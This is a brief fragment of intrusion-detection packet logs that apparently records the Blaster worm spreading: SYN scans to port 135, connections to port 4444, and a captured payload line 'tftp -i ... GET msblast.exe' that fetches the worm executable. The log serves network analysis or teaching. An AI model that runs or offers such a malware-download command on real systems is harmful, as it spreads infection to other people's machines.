DgmLen:48 DF ******S* Seq: 0xB844CC0 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.488662 137.189.99.200:1090 -> 168.235.185.60:135 TCP TTL:128 TOS:0x0 ID:193 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB85E5D2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.543722 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57052 IpLen:20 DgmLen:40 DF *****R** Seq: 0xCA1A3C9F Ack: 0xB15C968 Win: 0x0 TcpLen: 20 Worm propagate from a private IP network 08/19-14:00:17.918435 81.50.159.105:58322 -> 192.168.20.2:4444 TCP TTL:108 TOS:0x0 ID:11592 IpLen:20 DgmLen:74 DF ***AP*** Seq: 0xE99DB9C1 Ack: 0x1EDF0906 Win: 0xFAF0 TcpLen: 20 tftp -i 10.1.2.34 GET msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+